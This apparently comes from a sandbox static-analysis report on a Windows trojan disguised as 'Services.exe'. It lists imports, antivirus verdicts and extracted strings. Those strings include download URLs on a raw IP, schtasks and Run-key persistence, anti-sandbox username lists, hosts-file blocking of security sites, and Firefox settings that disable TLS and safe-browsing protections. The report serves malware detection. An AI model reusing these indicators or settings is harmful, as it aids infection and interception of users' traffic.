Static | ZeroBOX

PE Compile Time

2024-07-27 10:20:09

PE Imphash

5aceba6b8f80a97c0ff1e3c072a69b00

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00001000 | 0x000272d4 | 0x00027400 | 6.4145061715 |
| .rdata | 0x00029000 | 0x0000ffa6 | 0x00010000 | 4.50169863675 |
| .data | 0x00039000 | 0x000178a0 | 0x00014e00 | 5.50033635014 |
| .pdata | 0x00051000 | 0x00001f50 | 0x00002000 | 5.36517973393 |
| .rsrc | 0x00053000 | 0x00000320 | 0x00000400 | 2.60330126622 |
| .reloc | 0x00054000 | 0x00001cf4 | 0x00001e00 | 1.9868466963 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x00053060 | 0x000002c0 | LANG_ENGLISH | SUBLANG_ENGLISH_US | data |

Imports

Library ntdll.dll:
0x1400294b0 NtClose
0x1400294b8 NtWriteFile
0x1400294c0 NtMapViewOfSection
0x1400294c8 NtSetInformationFile
0x1400294d0 RtlInitUnicodeString
0x1400294d8 NtSetInformationProcess
0x1400294e0 RtlAdjustPrivilege
0x1400294e8 NtCreateSection
0x1400294f0 NtOpenFile
Library USER32.dll:
0x140029470 wsprintfA
Library OLEAUT32.dll:
0x140029438 VariantClear
Library SHLWAPI.dll:
0x140029460 PathFindFileNameW
Library ADVAPI32.dll:
0x140029000 RegCloseKey
0x140029008 RegOpenKeyExW
0x140029010 RegOpenKeyExA
0x140029018 RegSetValueExA
0x140029020 GetTokenInformation
0x140029028 GetUserNameW
0x140029030 AdjustTokenPrivileges
0x140029038 LookupPrivilegeValueA
0x140029040 OpenProcessToken
0x140029048 RegSetValueExW
Library WININET.dll:
0x140029480 InternetOpenUrlW
0x140029488 InternetReadFile
0x140029490 InternetCloseHandle
0x140029498 HttpQueryInfoA
0x1400294a0 InternetOpenW
Library SHELL32.dll:
0x140029448 SHGetFolderPathA
0x140029450 SHGetFolderPathW
Library KERNEL32.dll:
0x140029058 IsValidLocaleName
0x140029060 LCMapStringEx
0x140029068 GetUserDefaultLocaleName
0x140029070 FreeEnvironmentStringsW
0x140029078 GetEnvironmentStringsW
0x140029080 GetTickCount64
0x140029088 QueryPerformanceCounter
0x140029090 EnumSystemLocalesEx
0x140029098 FlsFree
0x1400290a0 FlsSetValue
0x1400290a8 FlsGetValue
0x1400290b0 FlsAlloc
0x1400290c0 UnhandledExceptionFilter
0x1400290c8 RtlVirtualUnwind
0x1400290d0 RtlCaptureContext
0x1400290d8 GetConsoleMode
0x1400290e0 GetConsoleCP
0x1400290e8 FlushFileBuffers
0x1400290f0 HeapReAlloc
0x1400290f8 LoadLibraryExW
0x140029100 OutputDebugStringW
0x140029108 ReadConsoleW
0x140029110 SetStdHandle
0x140029118 WriteConsoleW
0x140029120 GetModuleHandleW
0x140029128 UnmapViewOfFile
0x140029130 SetFilePointerEx
0x140029138 GetStartupInfoW
0x140029140 InitOnceExecuteOnce
0x140029148 GetFileType
0x140029150 HeapSize
0x140029158 GetStdHandle
0x140029160 GetModuleHandleExW
0x140029168 GetCurrentThreadId
0x140029170 GetThreadContext
0x140029178 GetTempFileNameW
0x140029180 GetFileSize
0x140029188 SetThreadContext
0x140029190 SetFilePointer
0x140029198 GetCurrentProcess
0x1400291a0 WaitForSingleObject
0x1400291a8 WriteFile
0x1400291b0 OpenProcess
0x1400291b8 GetSystemDirectoryW
0x1400291c0 LoadLibraryW
0x1400291c8 GetModuleFileNameW
0x1400291d0 CreateFileW
0x1400291d8 GetTempPathW
0x1400291e0 GetLastError
0x1400291e8 GetProcAddress
0x1400291f0 VirtualAllocEx
0x1400291f8 LoadLibraryA
0x140029200 GetModuleHandleA
0x140029208 Wow64SetThreadContext
0x140029210 CloseHandle
0x140029218 WriteProcessMemory
0x140029220 ResumeThread
0x140029228 Wow64GetThreadContext
0x140029230 CreateThread
0x140029238 HeapAlloc
0x140029240 GetProcessHeap
0x140029248 Sleep
0x140029250 Process32First
0x140029258 CreateRemoteThread
0x140029260 Process32Next
0x140029268 CreateToolhelp32Snapshot
0x140029270 VirtualProtectEx
0x140029278 ExitProcess
0x140029280 FindFirstFileW
0x140029288 MapViewOfFile
0x140029290 SetEndOfFile
0x140029298 CreateProcessW
0x1400292a0 CompareFileTime
0x1400292a8 VirtualFree
0x1400292b0 GetWindowsDirectoryA
0x1400292b8 GetProcessTimes
0x1400292c0 GetVolumeInformationA
0x1400292c8 CopyFileW
0x1400292d0 TerminateProcess
0x1400292d8 ReadFile
0x1400292e0 lstrcatA
0x1400292e8 CreateDirectoryA
0x1400292f0 VirtualAlloc
0x1400292f8 CopyFileA
0x140029300 SetFileAttributesA
0x140029308 FindClose
0x140029310 Process32FirstW
0x140029318 CreateFileMappingA
0x140029320 IsWow64Process
0x140029328 GetModuleFileNameA
0x140029330 Process32NextW
0x140029338 CreateMutexA
0x140029340 IsDebuggerPresent
0x140029348 FindNextFileW
0x140029350 DeleteFileW
0x140029358 SetFileAttributesW
0x140029368 MultiByteToWideChar
0x140029370 WideCharToMultiByte
0x140029378 LocalFree
0x140029380 GetStringTypeW
0x140029388 EncodePointer
0x140029390 DecodePointer
0x140029398 EnterCriticalSection
0x1400293a0 LeaveCriticalSection
0x1400293b0 DeleteCriticalSection
0x1400293b8 GetLocaleInfoEx
0x1400293c0 HeapFree
0x1400293c8 GetCPInfo
0x1400293d8 GetSystemTimeAsFileTime
0x1400293e0 GetCommandLineW
0x1400293e8 RtlLookupFunctionEntry
0x1400293f0 RtlUnwindEx
0x1400293f8 RtlPcToFileHeader
0x140029400 RaiseException
0x140029410 IsValidCodePage
0x140029418 GetACP
0x140029420 GetOEMCP
0x140029428 SetLastError

Exports

| Ordinal | Address | Name |
|---|---|---|
| 1 | 0x140003e14 | Start |
!This program cannot be run in DOS mode.
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
bad allocation
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefABCDEF
Unknown exception
bad exception
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
CorExitProcess
(null)
`h````
xpxxxx
GetCurrentPackageId
UTF-16LE
UNICODE
_hypot
_nextafter
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`h`hhh
xppwpp
CreateFile2
1#SNAN
1#QNAN
\Mb=Lk
Kagj(h
generic
unknown error
iostream
iostream stream error
system
kernel32
CreateProcessInternalW
RtlCreateProcessParametersEx
ntdll.dll
NtCreateProcessEx
NtCreateThreadEx
NtQueryInformationFile
NtQuerySystemInformation
NtSuspendProcess
NtResumeProcess
invalid string position
string too long
SeDebugPrivilege
vector<T> too long
ReflectiveLoader
firefox.exe
chrome.exe
msedge.exe
opera.exe
bad locale name
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
{%08lX%04lX%lu}
CreateProcess failed (
Software\Microsoft\Windows\CurrentVersion\Run
Failed to open registry key.
Failed to set registry value.
Services
bad cast
NtWriteFile
NtMapViewOfSection
RtlInitUnicodeString
NtSetInformationFile
NtClose
NtOpenFile
NtCreateSection
RtlAdjustPrivilege
NtSetInformationProcess
ntdll.dll
wsprintfA
USER32.dll
OLEAUT32.dll
PathFindFileNameW
SHLWAPI.dll
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
GetUserNameW
GetTokenInformation
RegSetValueExA
RegOpenKeyExA
RegOpenKeyExW
RegCloseKey
RegSetValueExW
ADVAPI32.dll
InternetOpenW
HttpQueryInfoA
InternetOpenUrlW
InternetReadFile
InternetCloseHandle
WININET.dll
SHGetFolderPathW
SHGetFolderPathA
SHELL32.dll
GetThreadContext
GetTempFileNameW
GetFileSize
SetThreadContext
SetFilePointer
GetCurrentProcess
WaitForSingleObject
WriteFile
OpenProcess
GetSystemDirectoryW
LoadLibraryW
GetModuleFileNameW
CreateFileW
GetTempPathW
GetLastError
GetProcAddress
VirtualAllocEx
LoadLibraryA
GetModuleHandleA
Wow64SetThreadContext
CloseHandle
WriteProcessMemory
ResumeThread
Wow64GetThreadContext
CreateThread
HeapAlloc
GetProcessHeap
Process32First
CreateRemoteThread
Process32Next
CreateToolhelp32Snapshot
VirtualProtectEx
ExitProcess
FindFirstFileW
MapViewOfFile
UnmapViewOfFile
SetEndOfFile
CreateProcessW
CompareFileTime
VirtualFree
GetWindowsDirectoryA
GetProcessTimes
GetVolumeInformationA
CopyFileW
TerminateProcess
ReadFile
lstrcatA
CreateDirectoryA
VirtualAlloc
CopyFileA
SetFileAttributesA
FindClose
Process32FirstW
CreateFileMappingA
IsWow64Process
GetModuleFileNameA
Process32NextW
CreateMutexA
IsDebuggerPresent
FindNextFileW
DeleteFileW
SetFileAttributesW
ExpandEnvironmentStringsW
MultiByteToWideChar
WideCharToMultiByte
LocalFree
GetStringTypeW
EncodePointer
DecodePointer
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionEx
DeleteCriticalSection
GetLocaleInfoEx
HeapFree
GetCPInfo
IsProcessorFeaturePresent
GetSystemTimeAsFileTime
GetCommandLineW
RtlLookupFunctionEntry
RtlUnwindEx
RtlPcToFileHeader
RaiseException
InitializeCriticalSectionAndSpinCount
IsValidCodePage
GetACP
GetOEMCP
SetLastError
GetCurrentThreadId
GetModuleHandleExW
GetStdHandle
HeapSize
GetFileType
InitOnceExecuteOnce
GetStartupInfoW
SetFilePointerEx
FlushFileBuffers
GetConsoleCP
GetConsoleMode
RtlCaptureContext
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
GetModuleHandleW
QueryPerformanceCounter
GetTickCount64
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetUserDefaultLocaleName
LCMapStringEx
IsValidLocaleName
EnumSystemLocalesEx
HeapReAlloc
LoadLibraryExW
OutputDebugStringW
ReadConsoleW
SetStdHandle
WriteConsoleW
KERNEL32.dll
Sniffthem.exe
.?AV_com_error@@
.?AVbad_alloc@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AV_Locimp@locale@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$codecvt@DDH@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
!This program cannot be run in DOS mode.
SeDebugPrivilege
firefox.exe
string too long
invalid string position
vector<T> too long
ReflectiveLoader
InternetOpenW
HttpQueryInfoA
InternetOpenUrlW
InternetReadFile
InternetCloseHandle
WININET.dll
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
ADVAPI32.dll
HeapAlloc
GetCurrentProcess
Process32First
WaitForSingleObject
GetProcessHeap
OpenProcess
Process32Next
CreateToolhelp32Snapshot
CloseHandle
CreateRemoteThread
VirtualProtectEx
VirtualAllocEx
WriteProcessMemory
EncodePointer
DecodePointer
GetCommandLineW
RaiseException
RtlUnwind
IsDebuggerPresent
IsProcessorFeaturePresent
GetLastError
InterlockedDecrement
ExitProcess
GetModuleHandleExW
GetProcAddress
MultiByteToWideChar
HeapSize
GetStdHandle
WriteFile
GetModuleFileNameW
HeapFree
SetLastError
InterlockedIncrement
GetCurrentThreadId
GetFileType
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
InitOnceExecuteOnce
GetStartupInfoW
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetTickCount64
GetEnvironmentStringsW
FreeEnvironmentStringsW
UnhandledExceptionFilter
SetUnhandledExceptionFilter
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
TerminateProcess
GetModuleHandleW
EnterCriticalSection
LeaveCriticalSection
LoadLibraryExW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
HeapReAlloc
OutputDebugStringW
LoadLibraryW
WideCharToMultiByte
LCMapStringEx
GetStringTypeW
FlushFileBuffers
GetConsoleCP
GetConsoleMode
SetStdHandle
SetFilePointerEx
WriteConsoleW
CreateFileW
KERNEL32.dll
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
.?AVsystem_error@std@@
.?AVbad_cast@std@@
.?AV?$basic_filebuf@_WU?$char_traits@_W@std@@@std@@
.?AVexception@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@_WDH@std@@
.?AV?$basic_istream@_WU?$char_traits@_W@std@@@std@@
.?AVios_base@std@@
.?AV?$basic_ofstream@_WU?$char_traits@_W@std@@@std@@
.?AV?$ctype@_W@std@@
.?AVfailure@ios_base@std@@
.?AVruntime_error@std@@
.?AV?$ctype@D@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AV?$numpunct@D@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ifstream@_WU?$char_traits@_W@std@@@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV_Facet_base@std@@
.?AUctype_base@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
.?AVfacet@locale@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
LC_ALL
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
mscoree.dll
- floating point support not loaded
- not enough space for arguments
- not enough space for environment
- abort() has been called
- not enough space for thread data
- unexpected multithread lock error
- unexpected heap error
- unable to open console device
- not enough space for _onexit/atexit table
- pure virtual function call
- not enough space for stdio initialization
- not enough space for lowio initialization
- unable to initialize heap
- CRT not initialized
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- not enough space for locale information
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- inconsistent onexit begin-end variables
DOMAIN error
SING error
TLOSS error
runtime error
Runtime Error!
Program:
<program name unknown>
Microsoft Visual C++ Runtime Library
(null)
kernel32.dll
UTF-16LE
UNICODE
american
american english
american-english
australian
belgian
canadian
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
dutch-belgian
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
french-belgian
french-canadian
french-luxembourg
french-swiss
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
irish-english
italian-swiss
norwegian
norwegian-bokmal
norwegian-nynorsk
portuguese-brazilian
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
swedish-finland
america
britain
england
great britain
holland
hong-kong
new-zealand
pr china
pr-china
puerto-rico
slovak
south africa
south korea
south-africa
south-korea
trinidad & tobago
united-kingdom
united-states
USER32.DLL
CONOUT$
gNIKMOK
Mozilla/5.0
Taskmgr.exe
ProcessHacker.exe
firefox.exe
http://176.111.174.140/api/update32.pack
chrome.exe
msedge.exe
opera.exe
http://176.111.174.140/api/update.pack
http://176.111.174.140/api/update2.pack
relog.exe
%SystemRoot%\system32\relog.exe
george
Darrel Jones
John Zalinsky
John Doe
SHCtAGa3rm
UV0U6479boGY
8wjXNBz
WALKER
oxYT3lZggZMK
t3wObOwwaW
jaakw.q
sMdVVcp
06AAy3
mLfaNLLP
JPQlavKFb0Lt0
7HV8BUt5BIsCZ
aFgxGd9fq4Iv8
wdagutilityaccount
WDAGUtilityAccount
hal9th
malware
sandbox
sample
currentuser
hapubws
hong lee
it-admin
johnson
miller
milozs
microsoft
sand box
maltest
schtasks /create /tn "SystemServicesTools" /tr "
" /sc onstart /f
Unknown
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
Software\Microsoft\Windows\CurrentVersion\Run
\Service_
" /tr "
schtasks /create /tn "
Service_
SystemUpdate.exe
https://176.111.174.140/event.php
http://176.111.174.140/event.php
explorer.exe
\Mozilla\Firefox\Profiles\
release
\drivers\etc\hosts
virustotal
www.malwarebytes.com
en.malwarebytes.com
fr.malwarebytes.com
es.malwarebytes.com
www.avast.com
www.avg.com
www.avira.com
www.360totalsecurity.com
www.bitdefender.com
www.eset.com
www.norton.com
wdcp.microsoft.com
wdcpalt.microsoft.com
wdprod.microsoft.com
wdcpes.microsoft.com
www.mcafee.com
www.comodo.com
www.virustotal.com
0.0.0.0
\prefs.js
user_pref("network.http.http2.enabled", false);
user_pref("network.http.http3.enable", false);
user_pref("network.http.version", 1);
user_pref("network.http.http4.enable", false);
user_pref("network.trr.no_warn_on_network_change", true);
user_pref("network.http.max_response_headers_kb", -1);
user_pref("network.http.enforce-framing.strict_chunked_encoding", false);
user_pref("network.http.response.timeout", -1);
user_pref("network.trr.send_empty_accept-encoding_headers", true);
user_pref("network.auth.non-web-content-triggered-resources-http-auth-allow", true);
user_pref("security.csp.enable", false);
user_pref("security.xss_detection.main_thread_script_filter", false);
user_pref("security.mixed_content.block_display_content", false);
user_pref("security.mixed_content.block_object_subrequest", false);
user_pref("security.fileuri.strict_origin_policy", false);
user_pref("security.fileuri.origin_policy", 0);
user_pref("security.sri.enable", false);
user_pref("privacy.firstparty.isolate", false);
user_pref("browser.xul.error_pages.expert_bad_cert", true);
user_pref("browser.ssl_override_behavior", 1);
user_pref("browser.safebrowsing.downloads.remote.enabled", false);
user_pref("security.tls.insecure_fallback_hosts.use_static_list", false);
user_pref("security.tls.version.min", 1);
user_pref("security.tls.version.max", 4);
user_pref("security.tls.version.fallback-limit", 4);
user_pref("security.tls.insecure_alerts", false);
user_pref("security.ssl.enable_ocsp_stapling", false);
user_pref("security.OCSP.require", false);
user_pref("security.cert_pinning.enforcement_level", 0);
user_pref("browser.safebrowsing.downloads.remote.url", "");
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.phishing.enabled", false);
user_pref("privacy.trackingprotection.enabled", false);
user_pref("privacy.donottrackheader.enabled", false);
user_pref("dom.security.https_only_mode", false);
user_pref("security.enterprise_roots.enabled", true);
user_pref("security.ssl.errorReporting.enabled", false);
user_pref("security.ssl.errorReporting.url", "");
user_pref("security.ssl.enable_false_start", true);
user_pref("security.ssl.require_safe_negotiation", false);
user_pref("security.ssl.treat_unsafe_negotiation_as_broken", false);
user_pref("security.ssl3.ecdhe_ecdsa_rc4_128_sha", false);
user_pref("security.ssl3.ecdhe_rsa_rc4_128_sha", false);
user_pref("security.ssl3.rsa_rc4_128_md5", false);
user_pref("security.ssl3.rsa_rc4_128_sha", false);
user_pref("security.tls.version.enable-deprecated", true);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled", false);
user_pref("browser.tabs.remote.autostart", false);
user_pref("browser.tabs.remote.autostart.2", false);
user_pref("gfx.direct2d.disabled", true);
user_pref("layers.acceleration.disabled", true);
user_pref("network.stricttransportsecurity.preloadlist", false);
user_pref("network.http.altsvc.enabled", false);
user_pref("network.http.spdy.enabled.http2", false);
user_pref("network.http.spdy.enabled.http2draft", false);
NIKMOK
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName Microsoft
FileDescription Services.exe
FileVersion 1.0.0.1
InternalName Services.exe
LegalCopyright Copyright (C) 2024
OriginalFilename Services.exe
ProductName Services.exe
ProductVersion 1.0.0.1
VarFileInfo
Translation
Antivirus Signature
Bkav W64.AIDetectMalware
Lionic Trojan.Win32.Nekark.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win64.NetLoader.fm
ALYac Trojan.Generic.36634384
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win64.Agent.Vgxn
K7AntiVirus Trojan ( 005b776e1 )
Alibaba Trojan:Win64/Nekark.65487e81
K7GW Trojan ( 005b776e1 )
Cybereason Clean
huorong Clean
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win64/Agent.EAQ
APEX Malicious
Avast Win64:TrojanX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.Generic.36634384
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.Generic.36634384
Tencent Malware.Win32.Gencirc.11c4776b
TACHYON Clean
Sophos Mal/Generic-R
F-Secure Trojan.TR/AD.Nekark.nhtjo
DrWeb Trojan.Siggen29.8832
VIPRE Trojan.Generic.36634384
TrendMicro Backdoor.Win64.ASYNCRAT.YXEG2Z
McAfeeD ti!4DA3BFF89FC7
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.61c5a8e414a47b8c
Emsisoft Trojan.Generic.36634384 (B)
Ikarus Trojan.Win64.Agent
GData Trojan.Generic.36634384
Jiangmin Clean
Webroot W32.Trojan.Gen
Varist Clean
Avira TR/AD.Nekark.nhtjo
Antiy-AVL GrayWare/Win32.Wacapew
Kingsoft Win32.Trojan.Generic.a
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft Trojan:Win32/Casdet!rfn
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Artemis!61C5A8E414A4
MAX malware (ai score=85)
VBA32 Clean
Malwarebytes Malware.AI.116915355
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall Backdoor.Win64.ASYNCRAT.YXEG2Z
Rising Trojan.Agent!8.B1E (TFE:5:Y2bFPPajU2P)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
Fortinet W64/Agent.EAQ!tr
BitDefenderTheta Clean
AVG Win64:TrojanX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Trojan:Win/Generic.Gen
No IRMA results available.